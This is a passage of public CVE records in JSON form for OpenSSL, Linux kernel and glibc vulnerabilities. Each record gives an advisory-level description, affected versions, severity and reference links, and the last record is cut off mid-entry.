https://security.netapp.com/advisory/ntap-20220715-0010/ | x_refsource_CONFIRM |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:32:09.267Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/openssl/openssl/issues/18625" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=4d8a88c134df634ba610ff8db1eb8478ac5fd345" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20220705.txt" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220715-0010/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "status": "affected", "version": "Affects OpenSSL 3.0.4" } ] } ], "datePublic": "2022-06-09T00:00:00", "descriptions": [ { "lang": "en", "value": "The OpenSSL 3.0.4 release introduced a serious bug in the RSA implementation for X86_64 CPUs supporting the AVX512IFMA instructions. This issue makes the RSA implementation with 2048 bit private keys incorrect on such machines and memory corruption will happen during the computation. As a consequence of the memory corruption an attacker may be able to trigger a remote code execution on the machine performing the computation. SSL/TLS servers or other servers using 2048 bit RSA private keys running on machines supporting AVX512IFMA instructions of the X86_64 architecture are affected by this issue." } ], "metrics": [ { "other": { "content": { "lang": "eng", "url": "https://www.openssl.org/policies/secpolicy.html#high", "value": "High" }, "type": "unknown" } } ], "problemTypes": [ { "descriptions": [ { "description": "Memory Corruption", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-07-15T15:07:19", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/openssl/openssl/issues/18625" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=4d8a88c134df634ba610ff8db1eb8478ac5fd345" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.openssl.org/news/secadv/20220705.txt" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20220715-0010/" } ], "title": "RSA implementation bug in AVX512IFMA instructions", "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "openssl-security@openssl.org", "DATE_PUBLIC": "2022-06-09", "ID": "CVE-2022-2274", "STATE": "PUBLIC", "TITLE": "RSA implementation bug in AVX512IFMA instructions" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "OpenSSL", "version": { "version_data": [ { "version_value": "Affects OpenSSL 3.0.4" } ] } } ] }, "vendor_name": "OpenSSL" } ] } }, "credit": [ { "lang": "eng", "value": "" } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The OpenSSL 3.0.4 release introduced a serious bug in the RSA implementation for X86_64 CPUs supporting the AVX512IFMA instructions. This issue makes the RSA implementation with 2048 bit private keys incorrect on such machines and memory corruption will happen during the computation. As a consequence of the memory corruption an attacker may be able to trigger a remote code execution on the machine performing the computation. SSL/TLS servers or other servers using 2048 bit RSA private keys running on machines supporting AVX512IFMA instructions of the X86_64 architecture are affected by this issue." } ] }, "impact": [ { "lang": "eng", "url": "https://www.openssl.org/policies/secpolicy.html#high", "value": "High" } ], "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Memory Corruption" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/openssl/openssl/issues/18625", "refsource": "CONFIRM", "url": "https://github.com/openssl/openssl/issues/18625" }, { "name": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=4d8a88c134df634ba610ff8db1eb8478ac5fd345", "refsource": "CONFIRM", "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=4d8a88c134df634ba610ff8db1eb8478ac5fd345" }, { "name": "https://www.openssl.org/news/secadv/20220705.txt", "refsource": "CONFIRM", "url": "https://www.openssl.org/news/secadv/20220705.txt" }, { "name": "https://security.netapp.com/advisory/ntap-20220715-0010/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20220715-0010/" } ] } } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2022-2274", "datePublished": "2022-07-01T07:30:17.282376Z", "dateReserved": "2022-06-30T00:00:00", "dateUpdated": "2024-09-17T00:20:40.199Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-47946
Vulnerability from cvelistv5
Published
2022-12-23 00:00
Modified
2024-08-03 15:02
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel 5.10.x before 5.10.155. A use-after-free in io_sqpoll_wait_sq in fs/io_uring.c allows an attacker to crash the kernel, resulting in denial of service. finish_wait can be skipped. An attack can occur in some situations by forking a process and then quickly terminating it. NOTE: later kernel versions, such as the 5.15 longterm series, substantially changed the implementation of io_sqpoll_wait_sq.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T15:02:36.593Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/12/22/2" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=v5.10.161\u0026id=0f544353fec8e717d37724d95b92538e1de79e86" }, { "name": "[oss-security] 20221227 Re: Linux kernel: use-after-free in io_sqpoll_wait_sq", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/27/1" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel 5.10.x before 5.10.155. A use-after-free in io_sqpoll_wait_sq in fs/io_uring.c allows an attacker to crash the kernel, resulting in denial of service. finish_wait can be skipped. An attack can occur in some situations by forking a process and then quickly terminating it. NOTE: later kernel versions, such as the 5.15 longterm series, substantially changed the implementation of io_sqpoll_wait_sq." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-27T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.openwall.com/lists/oss-security/2022/12/22/2" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=v5.10.161\u0026id=0f544353fec8e717d37724d95b92538e1de79e86" }, { "name": "[oss-security] 20221227 Re: Linux kernel: use-after-free in io_sqpoll_wait_sq", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/27/1" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-47946", "datePublished": "2022-12-23T00:00:00", "dateReserved": "2022-12-23T00:00:00", "dateUpdated": "2024-08-03T15:02:36.593Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1095
Vulnerability from cvelistv5
Published
2023-02-28 00:00
Modified
2024-08-02 05:32
Severity ?
EPSS score ?
Summary
In nf_tables_updtable, if nf_tables_table_enable returns an error, nft_trans_destroy is called to free the transaction object. nft_trans_destroy() calls list_del(), but the transaction was never placed on a list -- the list head is all zeroes, this results in a NULL pointer dereference.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Linux kernel netfilter subsystem. |
Version: Fixed in 6.0-rc1 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:32:46.346Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2173973" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/580077855a40741cf511766129702d97ff02f4d9" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux kernel netfilter subsystem.", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in 6.0-rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "In nf_tables_updtable, if nf_tables_table_enable returns an error, nft_trans_destroy is called to free the transaction object. nft_trans_destroy() calls list_del(), but the transaction was never placed on a list -- the list head is all zeroes, this results in a NULL pointer dereference." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-28T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2173973" }, { "url": "https://github.com/torvalds/linux/commit/580077855a40741cf511766129702d97ff02f4d9" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1095", "datePublished": "2023-02-28T00:00:00", "dateReserved": "2023-02-28T00:00:00", "dateUpdated": "2024-08-02T05:32:46.346Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-23219
Vulnerability from cvelistv5
Published
2022-01-14 00:00
Modified
2024-08-03 03:36
Severity ?
EPSS score ?
Summary
The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T03:36:20.178Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542" }, { "name": "GLSA-202208-24", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202208-24" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542" }, { "name": "GLSA-202208-24", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202208-24" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-23219", "datePublished": "2022-01-14T00:00:00", "dateReserved": "2022-01-14T00:00:00", "dateUpdated": "2024-08-03T03:36:20.178Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-29562
Vulnerability from cvelistv5
Published
2020-12-04 06:48
Modified
2024-08-04 16:55
Severity ?
EPSS score ?
Summary
The iconv function in the GNU C Library (aka glibc or libc6) 2.30 to 2.32, when converting UCS4 text containing an irreversible character, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.
References
▼ | URL | Tags |
---|---|---|
https://sourceware.org/bugzilla/show_bug.cgi?id=26923 | x_refsource_MISC | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/ | vendor-advisory, x_refsource_FEDORA | |
https://security.netapp.com/advisory/ntap-20210122-0004/ | x_refsource_CONFIRM | |
https://security.gentoo.org/glsa/202101-20 | vendor-advisory, x_refsource_GENTOO | |
https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E | mailing-list, x_refsource_MLIST |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T16:55:10.573Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=26923" }, { "name": "FEDORA-2021-6e581c051a", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20210122-0004/" }, { "name": "GLSA-202101-20", "tags": [ "vendor-advisory", "x_refsource_GENTOO", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202101-20" }, { "name": "[mina-dev] 20210225 [jira] [Created] (FTPSERVER-500) Security vulnerability in common/lib/log4j-1.2.17.jar", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The iconv function in the GNU C Library (aka glibc or libc6) 2.30 to 2.32, when converting UCS4 text containing an irreversible character, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-02-25T16:06:18", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=26923" }, { "name": "FEDORA-2021-6e581c051a", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20210122-0004/" }, { "name": "GLSA-202101-20", "tags": [ "vendor-advisory", "x_refsource_GENTOO" ], "url": "https://security.gentoo.org/glsa/202101-20" }, { "name": "[mina-dev] 20210225 [jira] [Created] (FTPSERVER-500) Security vulnerability in common/lib/log4j-1.2.17.jar", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-29562", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The iconv function in the GNU C Library (aka glibc or libc6) 2.30 to 2.32, when converting UCS4 text containing an irreversible character, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://sourceware.org/bugzilla/show_bug.cgi?id=26923", "refsource": "MISC", "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=26923" }, { "name": "FEDORA-2021-6e581c051a", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/" }, { "name": "https://security.netapp.com/advisory/ntap-20210122-0004/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20210122-0004/" }, { "name": "GLSA-202101-20", "refsource": "GENTOO", "url": "https://security.gentoo.org/glsa/202101-20" }, { "name": "[mina-dev] 20210225 [jira] [Created] (FTPSERVER-500) Security vulnerability in common/lib/log4j-1.2.17.jar", "refsource": "MLIST", "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-29562", "datePublished": "2020-12-04T06:48:23", "dateReserved": "2020-12-04T00:00:00", "dateUpdated": "2024-08-04T16:55:10.573Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2585
Vulnerability from cvelistv5
Published
2024-01-08 17:38
Modified
2024-09-04 19:03
Severity ?
EPSS score ?
Summary
It was discovered that when exec'ing from a non-leader thread, armed POSIX CPU timers would be left on a list but freed, leading to a use-after-free.
References
▼ | URL | Tags |
---|---|---|
https://ubuntu.com/security/notices/USN-5566-1 | third-party-advisory | |
https://ubuntu.com/security/notices/USN-5564-1 | third-party-advisory | |
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2585 | issue-tracking | |
https://ubuntu.com/security/notices/USN-5567-1 | third-party-advisory | |
https://lore.kernel.org/lkml/20220809170751.164716-1-cascardo@canonical.com/T/#u | issue-tracking | |
https://www.openwall.com/lists/oss-security/2022/08/09/7 | issue-tracking | |
https://ubuntu.com/security/notices/USN-5565-1 | third-party-advisory |
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | The Linux Kernel Organization | linux |
Version: 0 ≤ |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:39:08.282Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5566-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5564-1" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2585" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5567-1" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://lore.kernel.org/lkml/20220809170751.164716-1-cascardo@canonical.com/T/#u" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/08/09/7" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5565-1" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2022-2585", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-04-02T17:22:39.159224Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-09-04T19:03:25.626Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "packageName": "linux", "platforms": [ "Linux" ], "product": "linux", "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git", "vendor": "The Linux Kernel Organization", "versions": [ { "lessThan": "6.0~rc1", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "An independent security researcher working with SSD Secure Disclosure" } ], "descriptions": [ { "lang": "en", "value": "It was discovered that when exec\u0027ing from a non-leader thread, armed POSIX CPU timers would be left on a list but freed, leading to a use-after-free." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-08T17:38:27.327Z", "orgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "shortName": "canonical" }, "references": [ { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5566-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5564-1" }, { "tags": [ "issue-tracking" ], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2585" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5567-1" }, { "tags": [ "issue-tracking" ], "url": "https://lore.kernel.org/lkml/20220809170751.164716-1-cascardo@canonical.com/T/#u" }, { "tags": [ "issue-tracking" ], "url": "https://www.openwall.com/lists/oss-security/2022/08/09/7" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5565-1" } ] } }, "cveMetadata": { "assignerOrgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "assignerShortName": "canonical", "cveId": "CVE-2022-2585", "datePublished": "2024-01-08T17:38:27.327Z", "dateReserved": "2022-07-29T21:59:31.316Z", "dateUpdated": "2024-09-04T19:03:25.626Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-34918
Vulnerability from cvelistv5
Published
2022-07-04 20:07
Modified
2024-08-03 09:22
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges, a different vulnerability than CVE-2022-32250. (The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access.) This can be fixed in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.
References
▼ | URL | Tags |
---|---|---|
https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=7e6bc1f6cabcd30aba0b11219d8e01b952eacbb6 | x_refsource_MISC | |
https://lore.kernel.org/netfilter-devel/cd9428b6-7ffb-dd22-d949-d86f4869f452%40randorisec.fr/T/#u | x_refsource_MISC | |
https://www.openwall.com/lists/oss-security/2022/07/02/3 | x_refsource_MISC | |
http://www.openwall.com/lists/oss-security/2022/07/05/1 | mailing-list, x_refsource_MLIST | |
https://www.randorisec.fr/crack-linux-firewall/ | x_refsource_MISC | |
https://www.debian.org/security/2022/dsa-5191 | vendor-advisory, x_refsource_DEBIAN | |
http://www.openwall.com/lists/oss-security/2022/08/06/5 | mailing-list, x_refsource_MLIST | |
https://security.netapp.com/advisory/ntap-20220826-0004/ | x_refsource_CONFIRM | |
http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html | x_refsource_MISC | |
http://packetstormsecurity.com/files/168543/Netfilter-nft_set_elem_init-Heap-Overflow-Privilege-Escalation.html | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T09:22:10.749Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=7e6bc1f6cabcd30aba0b11219d8e01b952eacbb6" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://lore.kernel.org/netfilter-devel/cd9428b6-7ffb-dd22-d949-d86f4869f452%40randorisec.fr/T/#u" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/07/02/3" }, { "name": "[oss-security] 20220705 Re: Linux kernel: Netfilter heap buffer overflow in nft_set_elem_init", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/07/05/1" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.randorisec.fr/crack-linux-firewall/" }, { "name": "DSA-5191", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5191" }, { "name": "[oss-security] 20220806 Re: Linux kernel: Netfilter heap buffer overflow in nft_set_elem_init", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/08/06/5" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220826-0004/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://packetstormsecurity.com/files/168543/Netfilter-nft_set_elem_init-Heap-Overflow-Privilege-Escalation.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges, a different vulnerability than CVE-2022-32250. (The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access.) This can be fixed in nft_setelem_parse_data in net/netfilter/nf_tables_api.c." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-09-28T16:06:18", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=7e6bc1f6cabcd30aba0b11219d8e01b952eacbb6" }, { "tags": [ "x_refsource_MISC" ], "url": "https://lore.kernel.org/netfilter-devel/cd9428b6-7ffb-dd22-d949-d86f4869f452%40randorisec.fr/T/#u" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.openwall.com/lists/oss-security/2022/07/02/3" }, { "name": "[oss-security] 20220705 Re: Linux kernel: Netfilter heap buffer overflow in nft_set_elem_init", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/07/05/1" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.randorisec.fr/crack-linux-firewall/" }, { "name": "DSA-5191", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5191" }, { "name": "[oss-security] 20220806 Re: Linux kernel: Netfilter heap buffer overflow in nft_set_elem_init", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/08/06/5" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20220826-0004/" }, { "tags": [ "x_refsource_MISC" ], "url": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html" }, { "tags": [ "x_refsource_MISC" ], "url": "http://packetstormsecurity.com/files/168543/Netfilter-nft_set_elem_init-Heap-Overflow-Privilege-Escalation.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2022-34918", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges, a different vulnerability than CVE-2022-32250. (The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access.) This can be fixed in nft_setelem_parse_data in net/netfilter/nf_tables_api.c." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": 